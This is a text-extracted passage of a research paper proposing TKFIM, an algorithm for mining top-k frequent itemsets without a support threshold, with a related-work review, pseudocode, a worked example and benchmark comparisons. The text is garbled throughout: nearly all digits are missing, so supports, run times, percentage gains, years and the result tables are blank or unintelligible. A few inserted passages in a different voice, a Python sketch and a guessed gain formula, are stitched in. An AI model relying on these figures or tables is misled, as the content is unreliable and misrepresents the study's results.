intriguing itemsets, this apriori standard does not apply. cheung & fu ( ) have introduced a technique based on the principle of build once and mine once (bomo) to address the drawbacks of the most interesting items in mining. 
this procedure is based on the free parameter for n-most exciting items. the bomo is a technique based on fp-growth that uses the inherent characteristics of the iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. compact pattern-tree structure. it works without candidate generation to improve results in frequent itemsets mining problems. being an fp-growth-based approach, bomo suffers from common demerits, such as scanning the database multiple times to evaluate itemsets’ support. fp-tree structure is time-consuming, and visiting nodes to evaluate the support of itemsets is very in-efficient. consequently, the size of the database is immense. thus it may not be possible to store it in the main memory. as a result, the result set will cause the failure of the mining operation. top-k fis mining methods the top-k fis mining methods can be categorized as support threshold and non-threshold- based algorithms. most frequent pattern mining algorithms depend on the right minimum support threshold parameter. however, as already discussed, it is very tricky in practice to determine the right value for this parameter. therefore another category of top-k frequent itemsets algorithms is proposed, which are threshold-free. the top-k fis mining techniques are also classified as apriori and fp-based algorithms. the apriori based techniques generate fis of -itemsets, and then produced -itemset by joining them, and similarly -itemsets, and so on. on the other hand, fp-growth based top-k fis techniques make use of fp-tree for frequent mining patterns. it divides the transactions to reduce the scope of the search. the main advantage of fp-growth based algorithms is that the tree data structure is an unstructured form of the transaction database. these types of algorithms cannot be stored in memory and, therefore, costly to build. however, vertical format based techniques are more intuitive and straightforward as compared to horizontal format developing approaches. top-k frequent closed itemsets, the algorithm called tfp without the minimum threshold using the fp tree, have been suggested by han et al. ( ). the algorithm begins with the fp-tree, the primary threshold being set at zero. the smaller transaction, i.e., a transaction with length <minimum length, is pruned during the tree’s construction. after fp-tree construction, it uses a closed node count and a descendant sum method to prune the relatively unusual patterns by increasing the support threshold. in order to accelerate the process, the tfp algorithm uses fp-tree accessing strategies such as bottom-up and top-down. mining is performed on the final pruned fp-tree. on the other hand, the tfp algorithm has many demerits. for the fp-tree, the database must be scanned twice. the tfp is an fp-growth-inspired method and uses two parameters. this algorithm consumes a large search-space and uses expensive strategies to improve performance. amphawan, lenca & surarerks ( ) have focused on finding top-k periodic-frequent patterns. it initially considers the highest support patterns and then combines candidates to form the top-k periodic-frequent patterns list. pietracaprina & vandin ( ) suggested that top-k miner find top-k frequently closed unlimited items. the algorithm starts primarily with approximate minimum support having heuristics similar to those references in the above top-k closed frequent itemsets mining procedures. 
this procedure has dynamically raised the support threshold with no need to restart computation. it uses the priority queue to stop comparing the support of closed itemsets. further, it adopts the best-first search to iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. produce the first highest support closed itemsets. at the point when all the closed itemset support is processed, it terminates the main loop. at this point, k is assigned a new value, and the loop repeats to generate the highest support closed itemsets. a naive approach called the combination reducing method (crm) is recently proposed by pyun & yun ( ). this algorithm reduces time and saves memory by applying the composite pattern concept. the crm is fp-growth based algorithm that constructs a conditional fp-tree. the algorithm starts with an initial support threshold of zero while building the fp-tree from the dataset. following this, the algorithm constructs a global fp. during the development of the fp-tree, a header table is generated simultaneously. the sequence of selecting the prefix is different from fp-growth. the prefix is the center item in the header table that is quite suitable for the mining of top-k frequent patterns. it can raise the threshold effectively and process patterns quickly. crm does not consider the pattern length, so the top-k patterns are placed without length constraints into the top-k list. the current top-k composite pattern list and the recovery phase are used to create top-k patterns. on the other hand, the crm algorithm has numerous disadvantages. to build the fp-tree, it still has to scan the database twice. crm is an fp growth inspired approach and uses two parameters. this algorithm requires a large search-space and is expensive using the recovery phase to improve the performance. the top-k list includes many redundant composite patterns when the value of k is put as a large. pyun & yun ( ) also developed a combination reduction method for n-itemsets (crmn) followed itemset length constraints. crmn scans the dataset at least two times, and initial support is set to zero. in the mining procedure, crmn first constructs fp global-tree. it subsequently mines top-k patterns from fp-global-tree. during this process, the composite patterns are grouped into k-patterns for each length in the top-k list if the present conditional fp tree has one-path. if the tree has a multipath, the algorithm will detect frequent patterns and insert them into the top-k list according to its lengths. salam & khayal ( ) proposed top-most and top-k methods based on the association graph structure. a symmetric matrix stores the entry of the graph as a data structure. the algorithm scans the database once and starts with the fp tree with the initial support threshold of zero during the construction of the all-path source to destination (asd)- tree (salam & khayal, ). this method mines search-space and construct an asd tree simultaneously. it suffers from serious demerit that it computes all -itemsets and scans each transaction to build an association ratio graph. it computes edge values simultaneously to detect a maximum cycle. the other drawback in this approach is that it identifies those itemsets as top-k itemsets, but originally itemset has low dataset occurrence. recently, saif-ur-rehman et al. ( ) suggested a top-k miner approach to find fis. they scan the database once and find a supporting threshold higher than zero for all the frequent -itemsets. 
they use candidate itemsets search tree (cis-tree) (saif-ur-rehman et al., ) to mine the desired number of top-k fis of highest support. the technique suffers from various limitations, such as it computes -itemsets before constructing the cis-tree, which is expensive to build as it consumes much memory. this algorithm has reduced the search-space but has increased the runtime of the mining iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. process. furthermore, the frequent itemsets joining procedure for the construction of cis-tree is a time-consuming process. as discussed above, several frequent itemset mining practices were proposed, but they all face a challenge to reduce the time needed to calculate and reduce the space needed to perform the algorithm to mine all the frequent patterns required. the summary of top-k fis mining algorithms’ strengths and weaknesses are shown in table . it suggests that top-k frequent mining algorithms are needed to be further improved to produce efficient output. proposed methodology the objective of this paper is to present algorithms that can find top-k frequent itemsets without using the minsup parameter. the proposed algorithm begins by requesting that the user provide a ‘‘k’’ value, i.e., how many fis does he required? the system proposed initially generates a frequent itemset of size one by scanning the database for the first and last time. then the system uses equivalence classes to create the next frequent itemset level. the process repeats; initialize the item k at the next level to the lowest support until no frequent items or items can be found. the proposed work has two significant advantages: it does not require a support threshold, and secondly, the database is scanned once to generate fis. the detailed working of the proposed technique is discussed in this section. before going into exact steps, a few definitions are essential to understand. def- : frequent itemsets: in a given database d, an itemset x is referred to as frequent itemsets if its support is greater or even equal to the support of k itemset in a set of items i, where i is the set of items in the decreasing support order the support value is calculated from the user-supplied value of k (saif-ur-rehman et al., ). def- : identical frequent itemsets: in the given dataset d, identical frequent itemset (ifis) are those frequent itemset s = x , x ...xm has the same support as of set s where <=m<=i and s ⊆ i (saif-ur-rehman et al., ). def- : top-k frequent itemsets: a set of all ifis in s= {x , x ,.....xm} is called top-k frequent itemset if it includes frequent itemset of the highest support to the k th support itemset in i, where i is a set of all identical frequent itemsets (yildirim, birant & alpyildiz, ). top-k list structure in this sub-section, we describe list (amphawan, lenca & surarerks, ) is an efficient data structure uses in our method to accommodate candidate itemsets. the list is created dynamically based on the itemset to be generated, which holds all possible k itemsets based on users supplied value of k. the items in the list are sorted in support descending order. using a linked list in the suggested algorithm effectively reduces processing time and retrieves the itemsets from memory faster than an expensive i/o operation. the proposed tkfim algorithm uses vertical format datasets to generate frequent itemsets. list contains the set of nodes at different levels. 
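as a concrete picture of the list of nodes just described (the exact field layout, with itemset, support, diffset and size fields, is given in the next paragraph), the following minimal python sketch is one way such a node and a support-ordered list could look. it is an illustration written for this article, not the authors' implementation.

```python
from dataclasses import dataclass

@dataclass
class Node:
    itemset: tuple       # e.g. ("f", "b")
    support: int         # number of transactions containing the itemset
    diffset: frozenset   # tids in the prefix's tidset but not in this itemset's
    size: int            # level of the itemset, i.e. its length

class TopKList:
    """keeps candidate itemsets sorted by descending support."""
    def __init__(self):
        self.nodes = []

    def insert(self, node):
        self.nodes.append(node)
        self.nodes.sort(key=lambda n: n.support, reverse=True)

    def kth_support(self, k):
        # support of the k-th node, used as the pruning bound
        return self.nodes[k - 1].support if len(self.nodes) >= k else 0

topk = TopKList()
topk.insert(Node(("f",), 10, frozenset(), 1))
topk.insert(Node(("b",), 9, frozenset(), 1))
print(topk.kth_support(2))
```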
the -itemsets, -itemsets, or more are generated from the vertical dataset. iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table summary of the top-k frequent itemsets mining algorithms. s.no algorithm purpose of algorithm storage strengths limitations top k closed frequent patterns (tfp) (han et al., ) generate the top k closed patterns for specified value of k array without support threshold limit on candidates’ fis. item- sets mining method without candidates production •scan the database at least - times. • it misses certain important patterns •due to itemsets length restric- tion. •represent the only itemset of higher support in the top-k while other itemsets of similar support are not considered as top- k itemsets. top-n (fu, kwong & tang, ) generate the topmost patterns for specified value of n array without support threshold fis method •approach multiple scans •set two parameters. •apriori based •forced to reduce search-space •huge search space crmn (pyun & yun, ) to generate top k patterns with com- binations reducing method for n- item- sets. fp- tree without support threshold. itemsets mining method with- out candidates’ pro- duction. •more than - inputs parame- ters •stp based approach •forced to reduce search-space •scan db multiple times •required high computation time crm (pyun & yun, ) to generate top k patterns with com- binations reducing method for n- item- sets. fp- tree without support threshold. itemsets mining method with- out candidates’ pro- duction. •search-space focused •huge search space •scan db multiple times •heavy computation time re- quired (continued on next page) iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) s.no algorithm purpose of algorithm storage strengths limitations top-k maximal fis without support threshold (salam & khayal, ) to find top-most fis based on association ratio graph structure. graph without support threshold. • it computes all -itemsets and scans each transaction to build all path sources to destination tree (asd tree) simultaneously. • it identifies those itemsets as top-k itemsets originally item- set has low occurrence in the dataset. top-k miner (saif- ur-rehman et al., ) to find top-k fis without support threshold using cis tree. cis tree without support threshold. reduced the search space •high computation time re- quired high memory consump- tions. •the fis joining procedure is a time consuming process until the desired result is obtained. tkfim [proposed] top-k frequent item- sets mining without support threshold based on equivalence classes lookup list reduce search space and run time •the top-k-fis mining first generates the entire -itemsets with support from the given dataset which consumes huge memory at first level. •search space focused tech- nique the top-k list does not store any non-frequent itemset. the top-k list structure of a node is given in fig. : where the top-k list structure of a node having first field is used to store itemset, the second is the support field identified the number of times the itemset occurs in the dataset. diffset is the third field which stores the difference set of transaction id of transactions. the last field’s size points to the level of an itemset. detailed working of the algorithm it is a difficult task to find top-k frequent itemset in large databases. 
this section presents a new top-k mining algorithm that computes all top-k identical frequent itemsets (ifis) without a support threshold. the proposed procedure operates on a vertical database structure consisting of transaction ids followed by items. our technique uses a class-based search strategy to find the itemsets of highest support, and it mines the candidates of the current class based on the join process. candidate generation for the current class is stopped as soon as an itemset has less support than the least support in the top-k list; the joining process for the next class is then applied, and this is repeated until no frequent or candidate itemsets are found.

figure: structure of a top-k list node, with the fields itemsets, support, diffsets, and size.

algorithm: top-k fis mining algorithm
  scan d to generate the 1-itemsets with their support counts
  create the top-k list and initialize it with the 1-itemsets
  order the top-k list in descending order of support count
  smallestk <- support of the least-supported k-th itemset in the top-k list
  generate candidate itemsets with support counts using diffsets
  create a top-k list
  while k1 < len(list) do
    k1 <- k1 + 1
    while k2 < len(list) do
      if prefix_a == prefix_b then
        items <- [item_a, item_b]
        key <- prefix_a + items
        diffset <- t(item_a) - t(item_b)
        support <- support(item_a) - |diffset|
      end if
      create an itemset entry and insert it into the top-k list
      if support >= smallestk then
        itemset[key] <- support
      else if support < smallestk then
        break
      end if
    end while
    k2 <- k2 + 1
    k1 <- k1 + 1
  end while
  repeat the generation and insertion steps until no candidate itemsets can be found
  return the top-k list of fis

the pseudocode of our proposed methodology is given in the algorithm above, and the details of each step are described below: . scan the database and transform it into a vertical format. . sort all items in descending support order. . initialize the top-k list with the 1-itemsets, where k is the user-provided number of frequent itemsets.
it contains ten transactions having six different items. consider the number of required results specified by the user k is four and six. our task is to find the top-k itemsets with the highest support from the given transaction dataset. table illustrates the generated top- , top- and top- frequent itemsets from the given transaction database d. the first column in transaction databases represents the tids of itemsets, whereas the second column describes the itemsets. step : generating -itemset by scanning the transaction database the format of the input dataset is of considerable importance in most of the frequent itemsets mining algorithm. there are two types of dataset representations. one is a horizontal data format, and the other is a vertical data format. in a horizontal data format, a transaction database is similar to a list/array of transactions. each of the tid contains the itemsets. the horizontal transaction database format is given in table . in a vertical data format, each record represents a transaction. this transaction contains itemsets followed by a distinct transaction identifier. the vertical transaction database format is shown in table . most of the previous work adopts horizontal dataset representation. our algorithm has used the vertical layout of the dataset because the horizontal data format has some drawbacks. we first transform the input horizontal transaction dataset into a vertical format with only frequent itemsets and their corresponding transaction ids. this generates the k-itemsets of size one, as shown in table . iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table transaction database. tid items a,b,d,f a,b,f a,d,f b,c,d,e,f b,c,d,e,f a,b,f a,b,d,f a,b,f a,b,c,d,f a,b,c,e,f table generated top- , top- and top- itemsets. top-k fis top- fis top- fis top- fis f: f: f: b: , bf: b: , fb: b: , fb: a: , fa: a: , fa: ba: ba: d: , fd: bd= , fbd= table horizontal database format. tid items a,b,d,f a,b,f a,d,f b,c,d,e,f b,c,d,e,f a,b,f a,b,d,f a,b,f a,b,c,d,f a,b,c,e,f step : sort all items in descending support order all items are sorted in descending order, as shown in fig. (step ). step : computing -itemsets from -itemsets using diffsets pruning process the candidate’s generation process is based on two constraints. first, it requires the size of the itemsets to be the same. secondly, both itemset must have the same prefix, which means that each item of the itemset is identical except the last. when both itemsets meet iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table vertical database format. itemsets tid f , , , , , , , , , b , , , , , , , , a , , , , , , , d , , , , , c , , , e , , table converted vertical database format. itemsets tid a , , , , , , , b , , , , , , , , c , , , d , , , , , e , , f , , , , , , , , , these limitations, k + itemset is generated from k-itemsets with the help of equivalence classes, i.e., -itemsets at the next level are generated by joining every two k-itemset. top-k frequently mined itemsets calculate the difference between the tids lists in both items to find the support value. this will be the support of the newly generated itemsets. if the new itemset support is higher than the minimum kth support item in the top-k list, the newly generated itemset is entered in the top-k list. likewise, the kth pattern is removed from the list of top-k list and is designated as infrequent itemsets. 
after this step, our first iteration is completed, and as a result, each -itemsets is generated in the same manner as like itemset ‘fb’. we get the -itemsets, as shown in fig. , step ). pruning process in step as shown in fig. (step ), we compute -itemsets from -itemsets using difference sets in the given running example. item ‘f’ and ‘b’ are combined and append together to generate the itemsets ‘fb’ is a top-k frequent itemset. the difference set of ‘fb’ and support is calculated, which is . the support of ‘fb’ is greater than the minimum support inferred as support of the kth itemset in the top-k list. which can be used as support to prune the itemset, then the itemset ‘fb’ is inserted into the top-k list, and as a result, each -itemset are generated in the same manner as like itemset ‘fb,’ as shown in fig. (step ). step : remove infrequent itemsets by counting k value the -itemset node e and c are removed by counting the k value in the top-k list. the -itemset nodes are removed because their frequency is less than the minimum kth support item in the top-k list. iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure generation of top-k list structure. full-size doi: . /peerjcs. /fig- iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. step : repeating step- to step- we start the second iteration by sorting the generated -itemset given in fig. (step ). we do not need to scan the database any more to link -itemset in the top-k list. a new entry is created at every occurrence of an item in the top-k list. the itemsets are initialized with support and tids-list. the least support itemset used for the pruning process becomes the k itemset in the top-k list. then, the itemsets in the list are updated. the top-k list has been arranged in the order of descent. finally, all items with less support than the kth item in the top-k list are removed from the top-k list, according to the top-k counting procedure, when the user sets the k value. the itemset generation process is repeated. so in this iteration of the loop, we compute -itemsets from the -itemsets using diffset till the least support itemset in the top-k list. next level itemsets are generated with the help of equivalence classes. the generated -itemsets are as shown in fig. (step ). the process repeats until there are no frequent itemsets found. after that top-k list is returned as required by the user. step : top-k list is returned the generated top-k-list is shown in fig. (step ) returned by the tkfim algorithm. the procedure of the top-k frequent itemsets mining (tkfim) method for the example mentioned above is shown in fig. . experimental results in this section, we present the evaluation of the proposed system. first, there are standard data sets freely available, so they have been used to evaluate the proposed algorithm. we also compare our algorithms with two recent related methods: the top-k miner algorithm, which find the top-k frequent itemsets by using the candidate itemset search (cis-tree) (saif-ur-rehman et al., ) and the bomo algorithm calculating the common top-k itemsets (cheung & fu, ). the fact that they are newly proposed techniques and provided better results than their previous ones is the reason for selecting these two approaches. the techniques calculate frequent element sets by requesting k from the user. 
the experimental setup and dataset are provided in the following section. experimental setup and datasets several experiments were conducted to measure the performance of the algorithm and compare its results with the methods referred to above. the datasets are available freely and downloaded from the frequent implementation of items and mining (fimi) data repository (goethals, ). the dataset details are given in table . the first column of the table shows the dataset name. in the second column, the total number of transactions in a particular data set is described. whereas the number of items in one transaction is displayed in columns such as avg-length and items column represents the total number of unique elements within a dataset. the last column shows the dataset type. the transaction dataset chess, mushroom, connect, and the t i d k dataset are three real transactions. chess is the first real dataset with items and , dealings. it is a dense dataset with long and short itemset. there are items in the mushroom dataset iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. tid items a,b,d,f a,b,f a,d,f b,c,d,e,f b,c,d,e,f a,b,f a,b,d,f a,b,f a,b,c,d,f a,b,c,e,f scan d -itemsets items diffset support fb { } { } fa { , } { } fd { , , , } { } fc { , , , , , } { } fe { , , , , , , } { } ba { , } { } bd { , , , } { } bc { , , , , } { } be { , , , , , } { } ad { , , , } { } dc { , , } { } ce { } { } items tid’s list a { , , , , , , , } b { , , , , , , , , } c { , , , } d { , , , , , , } e { , , } f { , , , , , , , , , } compute -itemsets -itemsets items diffset support fba { , } { } fbd { , , , } { } let user specified number k= -itemsets items tid’s list f { , , , , , , , , , } b { , , , , , , , , } a { , , , , , , , } d { , , , , , , } c { , , , } e { , , } figure generation of frequent item sets. full-size doi: . /peerjcs. /fig- table datasets characteristics. .datasets # transactions ave-length #items type data set source chess , real http://fimi.uantwerpen.be/data/chess.dat mushroom real http://fimi.uantwerpen.be/data/mushroom.dat connect , real http://fimi.uantwerpen.be/data/connect.dat t i d k , , synthetic http://fimi.uantwerpen.be/data/t i d k.dat and transactions. the transaction size is an average of . this is a sparse dataset that contains a small number of common items. over items are built to connect. the longest average transaction volume is a dense dataset. t i d k is a synthetic dataset containing , items and a total transaction count of , items. this dataset has an average of transactions. the proposed technology was carried out in the programming language version . . of python for experimentation. the core duo machine with two gigabytes of memory and windows operating system is the experimental environment. results we have performed experiments on three real and one synthetic dataset. the first experiment has been performed on the aforementioned dataset and the results of the tkfim as shown in table . the first column of the table shows the transaction dataset sequence, the second column contains the data set name, the third column describes the iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://fimi.uantwerpen.be/data/chess.dat http://fimi.uantwerpen.be/data/mushroom.dat http://fimi.uantwerpen.be/data/connect.dat http://fimi.uantwerpen.be/data/t i d k.dat http://dx.doi.org/ . /peerj-cs. 
tkfim data of k= , the fourth column shows the transaction datasets of top-k miners, and the second column shows the results of the bomo procedure and the last column shows the itemsets missing by bomo. in the first stage, we compare the frequent itemsets generated by tkfim with the top-k miner and bomo approach. for the top- frequent itemsets on four datasets, we show the results in table . in the past, the top-n and the top-n support threshold for frequently used item sets are mining methods, such as fp-growth, top-n, and crmn. these methods fail to provide important support patterns due to the tuning of the threshold parameters. the bomo is one of the top pattern mining approaches using two parameters (cheung & fu, ). the n-most interesting itemset is the union of the n-most interesting itemsets with the highest supports for the value of some k. to demonstrate bomo with specified parameters k, having considered the same values for the specified parameter, we compute top- frequent itemsets on all datasets as shown in table . the bomo procedure returns the wrong result and misses essential patterns. the value of the k input parameter is taken up by our proposed tkfim and mine all top-k items in the dataset and does not miss the highest support pattern in the result set, as it is clear from table . the proposed system’s performance is now a matter of question, so we present its result in the next section. performance results of tkfim in the second phase, we study our proposed tkfim method’s performance without support threshold parameter performing sets of experiments on each dataset mentioned above, shown in table . to conduct experiments, the input value of k, provided by the user, is set in the range of five to thirty. figure shows the performance results of all the approaches mentioned above on the ‘‘chess’’ dataset. in this figure, each algorithm has its execution time on the vertical side, while each algorithm performance is shown with different k-values on the horizontal bar. the top-k miner performs poorly in a large value of k provided by the user. bomo produces a large number of infrequent patterns that increase its run time. in all cases, with a k value between five and thirty, the bomo algorithm has shown a poor performance. the blue bar represents the proposed algorithm tkfim, the brown bar expresses the top-k miner results, and the purple bar describes the bomo algorithm results. the presented results illustrate that tkfim outperforms both the top-k miner and bomo procedures. as shown in the graph, the tkfim discovers the top five frequent items in . s, where the top-k and bomo consume the same amount of time to do the same job. similarly, we discovered that the top ten frequent itemsets by tkfim take . s, whereas the top-k and bomo take six seconds to do the same job. the top thirty frequent itemsets by tkfim take . s, whereas the top-k consume a hundred seconds, and bomo takes , s. our proposed technique’s performance gain over bomo and top-k miner on chess dataset are . and . percent, respectively. figure shows the results of performance on the mushroom dataset. the algorithm’s execution time on the vertical side is shown in this figure, where the horizontal bar reflects every algorithm’s performance for different values of k. the top-k miner performs well iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table top-k fis mined by top-k miner, bomo and tkfim. 
s.no datasets results of tkfim for k= results of top-k miner for k= results of bomo for n = , k= wrong results itemsets missed by bomo . chess ) = ) = ) = = ) = ) = ) = , = ) , = ) , = ) = , = ) = ) = ) , = ) , = ) , = ) , = ) = , , = ) = , , = ) , = ) , , = , = ) , , = , = ) , , = ) = ) = ) , , = ) , , = ) , , = ) , , = ) , = ) , = . mushroom ) = ) = ) = ) = ) = , = ) = , = ) = ) , = ) = , = ) = , = ) = ) = ) , = , , = ) , = , , = ) , = ) , , , = ) = , = ) = , = ) , = ) , , = ) , = , , = ) , = , , = ) , = ) , = ) , = , , = , , = , , , = ) , = , , = , , = , , , = ) , , = ) , = ) = , = ) = , = ) , , = ) , = , , = ) , = , , = ) , , = ) , = , , = , , = = ) , = , , = , , = = . connect ) = ) = ) = ) = ) = ) = ) = ) , = ) = ) = ) = ) , = ) , = ) , = ) , = ) , = ) , = ) , = ) , = ) , = ) , = ) , , = ) , , = ) , , = (continued on next page) iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) s.no datasets results of tkfim for k= results of top-k miner for k= results of bomo for n = , k= wrong results itemsets missed by bomo ) = ) = ) , , = ) , = ) , = ) , , = ) , = ) , = . t i d k ) = ) = ) = ) = ) = ) = ) = ) = ) = ) = ) = ) = ) = ) = ) , = ) = ) = ) = ) , = ) = ) = ) = ) , = ) = ) = ) = ) , , = ) = ) = ) = ) , , = ) = ) = ) , , = ) = ) = on smaller values of k provided by the user. however, bomo poorly and increase its run time. in all cases of k between four and twenty, the bomo algorithm has shown a poor performance. further, the blue bar represents the proposed algorithm, the brown bar expresses the top-k miner results, and the purple bar describes the bomo algorithm results. the results show that the performance for a small amount of k is degraded compared to top-k miner because the data set contains only a few short, frequently used items. the tkfim discovers the top four common items in . s, in which the top-k and bomo take a second to do the same task, as shown in the graph. similarly, tkfim found that the top eight frequent itemsets take . s, and bomo took four seconds to do the same job. it also found that tkfim for finding top- frequent itemset takes . s, while the top-k miner takes s and bomo takes , s. the performance gain of our proposed technique over bomo and top-k miner on mushroom dataset is and . percent, respectively. in fig. , the performance results for the connect dataset are shown. in this figure, each algorithm has its execution time on the vertical side of this figure, while each algorithm performance with different k-values is shown on the horizontal bar. the top-k miner performs better on small values of k provided by the user. however, bomo suffered from increased run time. in all cases of k between and ,n the bomo algorithm shown a poor performance. further, the blue bar represents the proposed algorithm, the brown bar expresses the top-k miner results, and the purple bar describes the bomo algorithm results. as shown in the graph, the tkfim discovers the top five frequent items in . s, the top-k miner takes nine seconds, and bomo produces the result of the top five frequent items in s. similarly, to find the top frequent itemsets by tkfim took . s, top-k miner took iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. r u n t im e (s ec o n d s) k-itemsets chess tkfim top-k miner bomo figure performance results of tkfim on chess datasets. full-size doi: . /peerjcs. /fig- s, and bomo consumed s. 
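the percentage gains reported in this section are not defined by a formula in the surviving text; assuming they denote the usual relative reduction in run time with respect to a baseline, they would be computed as follows (the timings below are placeholders, not the paper's measurements).

```python
def percent_gain(t_baseline, t_tkfim):
    # relative run-time reduction of tkfim with respect to a baseline method
    return 100.0 * (t_baseline - t_tkfim) / t_baseline

# placeholder timings in seconds, purely for illustration
print(round(percent_gain(t_baseline=100.0, t_tkfim=0.5), 2))
```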
the performance gain of our proposed technique over bomo and top-k miner on connect dataset is . and . percent, respectively. the results of synthetic dataset t i d k are shown in fig. . the pattern length is short in synthetic datasets, but it has , items. in this figure, the execution time of each method is shown on the vertical side, whereas the horizontal bar represents the performance of each technique for varying values of k. the top-k miner performs better on small amounts of k provided by the user. we performed experiments for k between one and five. further, the blue bar represents the proposed algorithm, the brown bar expresses the top-k miner results, and the purple bar describes the bomo algorithm results. when frequent patterns of a higher length are discovered, bomo starts to suffer from a radical increase in execution time. as shown in the graph, the tkfim identifies the top one frequent item in . s, the top-k miner takes six seconds, and bomo produces a result of the top one frequent items in s. similarly, to find the top five frequent itemsets, tkfim takes . s, top-k miner takes s, and bomo consumes , s. our proposed technique’s performance gain over bomo and top-k miner on the t d k dataset is . and . percent, respectively. iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ru n t im e ( s e co n d s) k-itemsets mushroom tkfim top-k miner bomo figure performance results of tkfim on mushroom dataset. full-size doi: . /peerjcs. /fig- r u n t im e (s ec o n d s) k-itemsets connect tkfim top-k miner bomo figure performance results of tkfim on connect dataset. full-size doi: . /peerjcs. /fig- iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. r u n t im e (s ec o n d s) k-itemsets t i d k tkfim top-k miner bomo figure performance results of tkfim on synthetic dataset. full-size doi: . /peerjcs. /fig- memory usage of tkfim to evaluate the memory consumption of the tkfim algorithms, we execute our method for all the datasets. for the chess dataset, tkfim consumes a mb memory to obtain the result of top- , top- , and top- fis. however, it takes mb memory to produced top- and top- itemsets. similarly, on mushroom datasets, it consumes mb to compute top- fis and top- fis. in all experiments, the gap of memory consumption increases by mb while increasing the value of k. in conclusion, the tkfim algorithm presents the least memory for all the experimental datasets for a lesser value of k. the results of the various dataset are shown in fig. . the memory consumption results of dataset t d k, connect, mushroom, and chess are shown in figs. a, b, c, and d respecitively. these results were computed with the help of code which may not very accurate as because of different factors involment in memory consumpution. however, one thing which is apperent from these results is that less memory is needed for lesser value of k. conclusion frequent itemset mining is an exciting branch of data mining that focuses on looking at frequently co-occurring items. the items could be from patterns in any dataset like a market basket, word usage in documents, clicking behavior of users, gene sequencing, etc. due to its wide range of applications, researchers are always trying to produce effective iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . 
/peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. m em o ry ( m b s) k mushroom m em o ry ( m b s) k t i d k (a) m em o ry ( m b s) k chess (d) m em o ry ( m b s) k connect (c) (b) figure memory usage of tkfim algorithm. full-size doi: . /peerjcs. /fig- solutions. this research has also proposed, designed, and developed an algorithm based on equivalence classes and diffset theory for mining top-k frequent itemsets. it is found that the tkfim has outperformed the results of these approaches in terms of execution and performance, achieving . , . , . , and . percent gain on top-k miner using chess, mushroom, connect, and t d k datasets, respectively. similarly, tkfim has achieved . , , . , and . percent on bomo using chess, mushroom, connect, and t d k datasets, respectively. the proposed tkfim technique outperforms its counterpart on every dataset. in the future, we plan to adapt this work to solve other data mining tasks like sequential pattern mining, temporal fis mining, fis based clustering, and incremental frequent itemsets mining. additional information and declarations funding the work of lisu yu was supported by the state key laboratory of computer architecture (ict, cas) open project under grant carchb , and by nanchang university, nanchang, jiangxi, pr of china. this research was also funded by the deanship of scientific research at princess nourah bint abdulrahman university through the fast-track research iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. funding program. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: state key laboratory of computer architecture (ict, cas) open project: carchb . nanchang university, nanchang, jiangxi, pr of china. deanship of scientific research at princess nourah bint abdulrahman university. competing interests the authors declare there are no competing interests. author contributions • saood iqbal and abdul shahid conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • muhammad roman conceived and designed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • zahid khan conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • shaha al-otaibi performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • lisu yu performed the experiments, authored or reviewed drafts of the paper, arranged funding, and approved the final draft. data availability the following information was supplied regarding data availability: the data set and code are available in the supplemental files. data was taken from the frequent itemset mining dataset repository (http: //fimi.uantwerpen.be/data/): - t i d k: http://fimi.uantwerpen.be/data/t i d k.dat - chess: http://fimi.uantwerpen.be/data/chess.dat - connect: http://fimi.uantwerpen.be/data/connect.dat - mushroom: http://fimi.uantwerpen.be/data/mushroom.dat. 
